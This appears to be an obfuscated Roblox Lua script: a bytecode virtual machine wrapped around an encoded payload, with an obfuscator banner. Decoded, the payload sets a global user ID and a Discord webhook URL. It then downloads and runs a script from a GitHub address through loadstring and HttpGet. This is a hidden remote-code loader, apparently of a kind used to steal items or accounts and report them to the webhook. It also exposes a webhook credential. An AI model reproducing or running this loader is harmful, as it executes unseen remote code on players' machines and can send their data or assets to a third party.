--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to Roblox.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==7) then v30=function(v31,v32,v33)local v39=v31[1];local v40=v31[2];local v41=v31[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1 ;local function v72()local v73=v39;local v74=v40;local v75=v41;local v76=v28;local v77={};local v78={};local v79={};for v89=0 -0 ,v71 do if (((4310 -(180 + 109))>=(2218 + 1405)) and (v89>=v75)) then v77[v89-v75 ]=v70[v89 + (2 -(59 -(34 + 24))) ];else v79[v89]=v70[v89 + 1 + 0 ];end end local v80=(v71-v75) + (3 -(605 -(57 + 546))) ;local v81;local v82;while true do local v90=(1161 -248) -(690 + 223) ;while true do if ((v90==(1418 -(1157 + 260))) or (((4714 -(25 + 64)) -(494 + 211 + 448))==4434)) then if ((v82<=(1 + 3)) or ((2801 -(77 + (1753 -(1218 + 129))))>=(6026 -(1346 + 515)))) then if ((v82<=(1 + 0)) or ((5163 -(863 + 973))<=(1569 + 857))) then if (((754 + 2593)>1856) and (v82>(0 -0))) then do return;end else local v111=441 -(180 + 261) ;local v112;local v113;while true do if (((8359 -5401)>=(1655 -755)) and (0==v111)) then v112=0;v113=nil;v111=1 + 0 ;end if (((4978 -3288)<(5001 -(97 + 819))) and (v111==(1 + 0))) then while true do if ((3889<((21328 -15768) -(293 + 820))) and (0==v112)) then v113=v81[(1847 -(38 + 1354)) -(27 + 426) ];v79[v113]=v79[v113](v13(v79,v113 + (1 -0) ,v69));break;end end break;end end end elseif ((v82<=(1 + 1)) or ((80 + 1604)>=4172)) then if ((v79[v81[1 + 1 ]]==v81[15 -11 ]) or (300>=(7172 -4878))) then v68=v68 + 1 + 0 ;else v68=v81[1204 -(966 + 235) ];end elseif ((v82==(6 -3)) or ((3806 -(1005 + 587))>=(3084 + 390))) then v68=v81[1436 -(69 + 1343 + 21) ];else v79[v81[1819 -(285 + 1532) ]][v81[(21 -10) -8 ]]=v81[4];end elseif (((947 + 2122)>=((2739 -(190 + 1712)) + 471)) and (v82<=7)) then if (((993 -373)<1041) and (v82<=5)) then v79[v81[1 + 1 ]]=v33[v81[9 -6 ]];elseif ((v82>(1656 -(925 + 725))) or ((4660 -2626)<=(1178 -(1019 -(146 + 422))))) then if ((v81[2 + 0 ]==v79[v81[14 -10 ]]) or ((13779 -9144)<=(68 + 840))) then v68=v68 + (3 -2) ;else v68=v81[3];end else v79[v81[2 + (0 -0) ]]=v81[3 + 0 ];end elseif ((v82<=8) or ((2291 -(551 + 293))>(4155 -1479))) then v79[v81[2]]();elseif ((v82==9) or ((16058 -11137)<=2250)) then local v124=0 + 0 ;local v125;local v126;local v127;local v128;local v129;while true do if (((337 + (1301 -(263 + 27)))>=(1735 -(465 + 371))) and (v124==(522 -(223 + 297)))) then v129=nil;while true do if ((4616>=(3113 -(414 + 132))) and (v125==(1115 -((537 -181) + 616 + 143)))) then local v147=0;while true do if (((1919 -775)==1144) and (v147==(0 + 0))) then v126=v81[7 -5 ];v127,v128=v76(v79[v126](v13(v79,v126 + 1 + 0 ,v81[3])));v147=1 -0 ;end if (((3 -2)==v147) or (1943<(9000 -7181))) then v125=(1 -0) + 0 ;break;end end end if ((v125==(1608 -(960 + 388 + 259))) or ((3864 -(343 + 1201))>=(1516 + 2053))) then v69=(v128 + v126) -(1 + 0) ;v129=0;v125=2 + 0 ;end if (((209 + 992)<=1385) and (((9 -7) -0)==v125)) then for v153=v126,v69 do local v154=915 -(354 + 561) ;local v155;while true do if ((v154==(0 + 0)) or (2926>=(4900 -(389 + 299)))) then v155=966 -(226 + 258 + 482) ;while true do if ((v155==(0 + 0)) or ((386 -(19 + 69))==(382 + 209 + 1842))) then v129=v129 + (699 -(13 + 3 + 682)) ;v79[v153]=v127[v129];break;end end break;end end end break;end end break;end if ((v124==(259 -(119 + 139))) or ((3645 -(814 + 779))==4787)) then v127=nil;v128=nil;v124=1560 -(12 + 1546) ;end if ((v124==(0 + 0)) or ((7783 -4749)>((5333 -(119 + 396)) -(300 + 1195)))) then v125=0 + 0 ;v126=nil;v124=3 -2 ;end end else local v130=0 + (1178 -(925 + 253)) ;local v131;local v132;local v133;while true do if (((3897 + 226)==(10056 -5933)) and (v130==(0 -0))) then local v140=0 -0 ;while true do if ((v140==1) or (4219<=1)) then v130=1 + (0 -0) ;break;end if ((v140==(0 -0)) or ((3852 -(733 + 815))>(3845 -(842 + 32)))) then v131=0 -0 ;v132=nil;v140=1;end end end if ((v130==(1 + 0)) or ((31 + 164)>3167)) then v133=nil;while true do if ((v131==(0 + 0)) or (469==(561 + 2292))) then local v148=1715 -(780 + 136 + 799) ;local v149;while true do if (((6290 -(1206 + 243))>=(1204 + 2216)) and (v148==(0 + 0))) then v149=0 -0 ;while true do if ((((262 + 59) -180)==(333 -192)) and ((0 + 0)==v149)) then local v167=0 -0 ;while true do if ((v167==(3 -2)) or ((3740 + 585 + 216)==(3250 -1972))) then v149=765 -((186 -107) + 685) ;break;end if ((v167==(1231 -(33 + 22 + 1176))) or ((2064 + 2730)<=(1781 -(125 + 185)))) then v132=v81[2 -0 ];v133=v79[v81[5 -(1614 -(214 + 1398)) ]];v167=1 -0 ;end end end if (((11454 -6983)>(402 + 297)) and (v149==(565 -(224 + 340)))) then v131=1 + 0 ;break;end end break;end end end if ((619==(459 + 160)) and (v131==(1377 -(882 + 494)))) then v79[v132 + (1917 -(11 + 1905)) ]=v133;v79[v132]=v133[v81[14 -(20 -10) ]];break;end end break;end end end v68=v68 + (2 -1) ;break;end if (((2654 + 517)==(7585 -(5144 -(360 + 370)))) and (v90==(0 -0))) then v81=v73[v68];v82=v81[2 -1 ];v90=1020 -(597 + 422) ;end end end end A,B=v28(v11(v72));if  not A[1] then local v91=0;local v92;while true do if (v91==0) then v92=v31[4][v68] or "?" ;error("Script error at ["   .. v92   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end;return v30(v29(),{},v17)(...);end if (v18==3) then v24=nil;v24=function()local v42=0 + 0 ;local v43;local v44;local v45;local v46;while true do if (v42==(0 + 0)) then v43,v44,v45,v46=v1(v16,v19,v19 + ((4 + 0) -1) );v19=v19 + (4 -0) ;v42=1 + 0 ;end if (v42==(1 + 0)) then return (v46 * 16777216) + (v45 * ((192318 -148352) + 21570)) + (v44 * (684 -428)) + v43 ;end end end;v25=nil;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v34)if (v1(v34,2)==79) then local v83=0;while true do if (v83==0) then v20=v0(v3(v34,1,1));return "";end end else local v84=0;local v85;while true do if (0==v84) then v85=v2(v0(v34,16));if v20 then local v108=v5(v85,v20);v20=nil;return v108;else return v85;end break;end end end end);v18=1;end if (2==v18) then v22=function()local v47=0 -0 ;local v48;while true do if (v47==(0 -0)) then v48=v1(v16,v19,v19);v19=v19 + 1 ;v47=741 -(737 + 3) ;end if (v47==(1 + 0 + 0)) then return v48;end end end;v23=nil;v23=function()local v49,v50=v1(v16,v19,v19 + 2 );v19=v19 + 1 + 1 ;return (v50 * (127 + 129)) + v49 ;end;v18=3;end if (v18==5) then v27=v24;v28=nil;v28=function(...)return {...},v12("#",...);end;v18=6;end if (6==v18) then v29=nil;v29=function()local v51=1636 -(977 + 659) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=1) then else local v93=0;while true do if (v93==(1091 -(577 + 513))) then v51=741 -(269 + 470) ;break;end if (v93==0) then v54=nil;v55=nil;v93=1;end end end if (v51~=(1176 -(620 + 553))) then else v58=nil;while true do local v97=0 + 0 ;local v98;while true do if (v97==(0 -0)) then v98=0 + 0 ;while true do if (v98==(1 + 0)) then if (v52~=1) then else local v116=0 + 0 ;local v117;while true do if (v116==(0 -0)) then v117=0 -0 ;while true do if (v117~=2) then else v52=1 + 1 ;break;end if ((1 + 0)==v117) then local v143=0;local v144;while true do if (v143==(0 + 0)) then v144=0 -0 ;while true do if (v144==1) then v117=1 + 1 ;break;end if (v144~=0) then else for v163=1834 -(1582 + 251) ,v57 do local v164=0;local v165;local v166;while true do if ((2 -1)==v164) then if (v165==(1 -0)) then v166=v22()~=(1822 -(791 + 1031)) ;elseif (v165==(2 + 0)) then v166=v25();elseif (v165==(216 -(109 + 104))) then v166=v26();end v58[v163]=v166;break;end if (v164~=(0 -0)) then else local v172=0 + 0 ;while true do if (v172~=0) then else v165=v22();v166=nil;v172=2 -1 ;end if (v172==(2 -1)) then v164=2 -1 ;break;end end end end end v56[9 -6 ]=v22();v144=2 -1 ;end end break;end end end if (v117~=(0 + 0)) then else local v145=1979 -(787 + 1192) ;local v146;while true do if (v145~=(0 -0)) then else v146=0 -0 ;while true do if (v146==(1547 -(1490 + 56))) then v117=217 -(50 + 166) ;break;end if (v146==(506 -(147 + 359))) then local v161=0 -0 ;while true do if (v161~=(1 + 0)) then else v146=2 -1 ;break;end if ((76 -(48 + 28))~=v161) then else v57=v24();v58={};v161=1615 -(163 + 1451) ;end end end end break;end end end end break;end end end break;end if (v98==(0 -0)) then local v110=0;while true do if (v110==(193 -(118 + 74))) then v98=1;break;end if (v110==(633 -(262 + 371))) then if (v52==(0 + 0)) then local v134=0 -0 ;local v135;while true do if (v134~=(0 + 0)) then else v135=0;while true do if (v135~=(965 -(421 + 544))) then else local v156=0 -0 ;while true do if (v156==0) then v53={};v54={};v156=128 -(47 + 80) ;end if (v156==1) then v135=1;break;end end end if (v135==2) then v52=1;break;end if (v135~=(1383 -(645 + 737))) then else local v157=0;while true do if (v157==(1398 -(1050 + 348))) then local v162=0 + 0 ;while true do if (v162==1) then v157=1424 -(526 + 897) ;break;end if (v162==(676 -(349 + 327))) then v55={};v56={v53,v54,nil,v55};v162=1 -0 ;end end end if ((1 + 0)==v157) then v135=647 -(590 + 55) ;break;end end end end break;end end end if (v52==2) then local v136=1900 -(1349 + 551) ;local v137;local v138;while true do if ((0 -0)~=v136) then else v137=0;v138=nil;v136=3 -2 ;end if (v136==1) then while true do if (v137~=(497 -(139 + 358))) then else v138=0 -0 ;while true do local v158=0;while true do if (v158==(0 -0)) then if (v138==1) then for v173=1,v24() do v55[v173]=v24();end return v56;end if (v138~=(0 -0)) then else local v170=1679 -(55 + 1624) ;while true do if (v170==(1237 -(937 + 299))) then v138=1887 -(1182 + 704) ;break;end if (v170==(0 -0)) then for v177=3 -2 ,v24() do local v178=0 -0 ;local v179;local v180;local v181;local v182;while true do if (v178==(0 + 0)) then v179=0 -0 ;v180=nil;v178=990 -(728 + 261) ;end if (v178~=2) then else while true do if (v179~=(0 -0)) then else local v185=0 -0 ;while true do if (v185==(238 -(111 + 126))) then v179=1 + 0 ;break;end if ((0 -0)==v185) then v180=0;v181=nil;v185=1 + 0 ;end end end if (v179==1) then v182=nil;while true do if (v180==(792 -(207 + 584))) then while true do if (v181==(0 -0)) then v182=v22();if (v21(v182,421 -(368 + 52) ,1 -0 )~=(0 + 0)) then else local v187=0;local v188;local v189;local v190;local v191;while true do if (v187==(5 -3)) then while true do if (v188~=(534 -(446 + 88))) then else local v193=0;local v194;while true do if ((189 -(93 + 96))==v193) then v194=520 -(127 + 393) ;while true do if (v194~=0) then else local v207=1286 -(697 + 589) ;while true do if (v207~=(2 -1)) then else v194=1 -0 ;break;end if (v207==(951 -(750 + 201))) then v189=v21(v182,5 -3 ,6 -3 );v190=v21(v182,5 -1 ,6);v207=1 + 0 ;end end end if (v194~=(1 + 0)) then else v188=1859 -(1571 + 287) ;break;end end break;end end end if (v188~=2) then else local v195=0 -0 ;while true do if (v195==0) then if (v21(v190,1,1)==(1 + 0)) then v191[721 -(713 + 6) ]=v58[v191[86 -(34 + 50) ]];end if (v21(v190,2,2 -0 )==(410 -(383 + 26))) then v191[80 -(26 + 51) ]=v58[v191[3]];end v195=1 + 0 ;end if (v195==(1644 -(1336 + 307))) then v188=3;break;end end end if ((1 + 0)==v188) then v191={v23(),v23(),nil,nil};if (v189==(0 -0)) then local v197=0 -0 ;local v198;local v199;while true do if (v197==(0 + 0)) then v198=0 -0 ;v199=nil;v197=1;end if (v197==1) then while true do if (v198~=(0 -0)) then else v199=0 -0 ;while true do if (v199~=(0 + 0)) then else v191[560 -(254 + 303) ]=v23();v191[11 -7 ]=v23();break;end end break;end end break;end end elseif (v189==(2 -1)) then v191[3 + 0 ]=v24();elseif (v189==(7 -5)) then v191[2 + 1 ]=v24() -((2 + 0)^16) ;elseif (v189==(3 -0)) then local v209=0;local v210;local v211;while true do if (v209==1) then while true do if (v210==0) then v211=0 + 0 ;while true do if (v211~=(1540 -(1213 + 327))) then else v191[10 -7 ]=v24() -((816 -(222 + 592))^(16 + 0)) ;v191[4]=v23();break;end end break;end end break;end if (v209~=(0 -0)) then else v210=0 + 0 ;v211=nil;v209=1 + 0 ;end end end v188=5 -3 ;end if (3==v188) then if (v21(v190,3,10 -7 )==(1782 -(351 + 1430))) then v191[6 -2 ]=v58[v191[959 -(901 + 54) ]];end v53[v177]=v191;break;end end break;end if (v187==(0 -0)) then local v192=0;while true do if (v192~=0) then else v188=0 + 0 ;v189=nil;v192=1245 -(254 + 990) ;end if (v192~=(320 -(268 + 51))) then else v187=1;break;end end end if (v187==(1239 -(312 + 926))) then v190=nil;v191=nil;v187=3 -1 ;end end end break;end end break;end if (v180==0) then local v186=1378 -(1062 + 316) ;while true do if (v186~=1) then else v180=1;break;end if (v186==(1033 -(668 + 365))) then v181=0;v182=nil;v186=1 + 0 ;end end end end break;end end break;end if (v178~=1) then else v181=nil;v182=nil;v178=2 + 0 ;end end end for v183=1 + 0 ,v24() do v54[v183-1 ]=v29();end v170=1 -0 ;end end end break;end end end break;end end break;end end end v110=569 -(217 + 351) ;end end end end break;end end end break;end if (v51==0) then local v94=354 -(249 + 105) ;local v95;while true do if (v94~=(0 + 0)) then else v95=0;while true do if (v95~=1) then else v51=1 -0 ;break;end if (v95~=(0 -0)) then else local v109=0 + 0 ;while true do if (v109==(1732 -(1253 + 479))) then v52=0 -0 ;v53=nil;v109=1 -0 ;end if (v109==(2 -1)) then v95=1 + 0 ;break;end end end end break;end end end if (v51==(8 -6)) then local v96=0 + 0 ;while true do if (v96~=(1222 -(142 + 1079))) then else v51=3;break;end if (v96==0) then v56=nil;v57=nil;v96=1;end end end end end;v30=nil;v18=7;end if (v18==1) then v21=nil;v21=function(v35,v36,v37)if v37 then local v86=(v35/((1 + 1)^(v36-(2 -1))))%((2 -0)^(((v37-(1 + (899 -(648 + 251)))) -(v36-(768 -((594 -(11 + 1)) + 185)))) + (1593 -(1582 + 10)))) ;return v86-(v86%((1899 -(165 + 1733)) + 0)) ;else local v87=0;local v88;while true do if (v87==(0 + 0)) then v88=2^(v36-(1 + 0)) ;return (((v35%(v88 + v88))>=v88) and (1 + 0)) or (0 + 0) ;end end end end;v22=nil;v18=2;end if (v18==4) then v25=function()local v59=v24();local v60=v24();local v61=(4 + 0) -3 ;local v62=(v21(v60,1 -0 ,95 -75 ) * ((6 -(1 + 3))^(102 -70))) + v59 ;local v63=v21(v60,15 + 6 ,661 -(588 + 42) );local v64=((v21(v60,11 + 21 )==(1 + 0 + 0)) and  -(1455 -(1307 + 31 + 116))) or (1 + 0) ;if (v63==(1408 -(1237 + 171))) then if (v62==(0 -0)) then return v64 * (0 + 0) ;else local v99=0 + 0 + 0 ;while true do if (v99==(868 -(176 + 692))) then v63=1382 -(592 + 789) ;v61=1958 -(1541 + 417) ;break;end end end elseif (v63==(2459 -(35 + 377))) then return ((v62==(0 + 0)) and (v64 * ((1 -0)/(369 -(36 + 333))))) or (v64 * NaN) ;end return v8(v64,v63-(627 + 396) ) * (v61 + (v62/((3 -1)^(141 -89)))) ;end;v26=nil;v26=function(v38)local v65=0 -0 ;local v66;local v67;while true do if ((5 -(1 + 1))==v65) then return v6(v67);end if (v65==(1 + 1)) then v67={};for v100=1, #v66 do v67[v100]=v2(v1(v3(v66,v100,v100)));end v65=1655 -(1028 + 624) ;end if (v65==(695 -(524 + 171))) then v66=nil;if  not v38 then v38=v24();if (v38==(0 + 0)) then return "";end end v65=1593 -(1395 + 197) ;end if (v65==1) then v66=v3(v16,v19,(v19 + v38) -((1 + 1) -1) );v19=v19 + v38 ;v65=2;end end end;v18=5;end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F72692O7A6875622F6D61696E2F5363726970742E6C756103023O005F4703063O00557365724944022O00C0B1B0E9D14103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303831322O36374O35303331342O35382F324952645743676F2O33506E516B4F6133465A48596D55705351532O6668494F4570725845645167716C4D644745385A63392D646E766373503175744E426E584F77755200143O0012063O00013O000E070002000B00013O0004033O000B0001001205000100033O001205000200043O00200A000200020005001206000400064O0009000200046O00013O00022O00080001000100010004033O001300010026023O0001000100010004033O00010001001205000100073O003004000100080009001205000100073O0030040001000A000B0012063O00023O0004033O000100012O00013O00017O00143O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
